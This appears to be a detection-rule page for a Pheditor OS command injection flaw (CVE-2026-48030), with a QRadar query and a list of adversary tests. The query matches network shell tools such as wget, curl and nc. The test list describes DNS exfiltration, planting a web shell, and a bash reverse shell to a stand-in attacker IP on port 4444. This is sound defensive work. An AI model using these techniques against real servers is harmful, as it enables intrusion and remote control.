Detect Pheditor OS Command Injection via Unsanitized 'dir' Parameter (CVE-2026-48030) in IBM QRadar
Detects exploitation of CVE-2026-48030, a critical OS command injection vulnerability in Pheditor versions 2.0.1 through 2.0.3. The terminal handler accepts an unsanitized 'dir' parameter that is passed directly to a shell command, allowing unauthenticated or authenticated attackers to execute arbitrary OS commands on the hosting server. A public proof-of-concept exists, making active exploitation likely.
MITRE ATT&CK
QRadar Detection Query
SELECT
DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
sourceip,
destinationip,
destinationport,
URL,
"username",
QIDNAME(qid) AS event_name,
logsourcename(logsourceid) AS log_source,
CATEGORYNAME(category) AS category_name
FROM events
WHERE
LOGSOURCETYPENAME(devicetype) IN ('Apache HTTP Server', 'NGINX', 'PHP', 'Linux OS')
AND devicetime > NOW() - 1 HOURS
AND (
(
URL ILIKE '%pheditor%'
AND (
URL ILIKE '%dir=%26%'
OR URL ILIKE '%dir=%7C%'
OR URL ILIKE '%dir=%3B%'
OR URL ILIKE '%dir=%60%'
OR URL ILIKE '%whoami%'
OR URL ILIKE '%wget%'
OR URL ILIKE '%curl%'
OR URL ILIKE '%bash%'
OR URL ILIKE '%/tmp/%'
OR URL ILIKE '%sh%20-c%'
)
)
OR (
"Process Name" ILIKE '%sh%'
AND "Parent Process Name" ILIKE '%php%'
AND (
"Command" ILIKE '%whoami%'
OR "Command" ILIKE '%id %'
OR "Command" ILIKE '%uname%'
OR "Command" ILIKE '%cat /etc/%'
OR "Command" ILIKE '%wget %'
OR "Command" ILIKE '%curl %'
OR "Command" ILIKE '%nc %'
OR "Command" ILIKE '%chmod %'
)
)
)
ORDER BY devicetime DESCQRadar AQL query detecting Pheditor terminal handler exploitation by looking for HTTP requests with injection payloads in the dir parameter and correlating with process execution events showing shell commands running under PHP parent processes.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate developers using Pheditor terminal with URL-encoded directory paths containing special characters
- PHP applications that spawn shell processes for legitimate operational purposes
- Security scanners generating request patterns that match injection signatures
- Internal penetration testing activities against the web application
Other platforms for CVE-2026-48030
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Basic whoami Injection via dir Parameter
Expected signal: Web server access log entry showing request URI containing '%3B' and 'whoami'. Auditd EXECVE record for /usr/bin/whoami with parent process php-fpm or apache2 and uid matching the web server service account.
- Test 2Out-of-Band Data Exfiltration via DNS Lookup
Expected signal: DNS query from web server IP to attacker-controlled domain visible in DNS server logs and network flow data. Auditd record for nslookup or dig process spawned under web server account. NetworkConnect events from DeviceNetworkEvents to the external DNS resolver.
- Test 3Web Shell Implantation via Piped Command Chain
Expected signal: Auditd OPENAT/CREATE syscall for /var/www/html/shell.php attributed to web server service account. File creation event in EDR telemetry (DeviceFileEvents or equivalent) with InitiatingProcessFileName=php/apache2 and FileName=shell.php. Web server access log entry with %7C in the dir parameter.
- Test 4Reverse Shell via Bash TCP Redirect
Expected signal: Auditd EXECVE for bash with arguments '-i' and '/dev/tcp/ATTACKER_LAB_IP/4444' under web server parent process. Outbound TCP connection from web server to attacker lab IP on port 4444 in network flow logs. DeviceNetworkEvents entry from the EDR showing the connection establishment.
Unlock Pro Content
Get the full detection package for CVE-2026-48030 including response playbook, investigation guide, and atomic red team tests.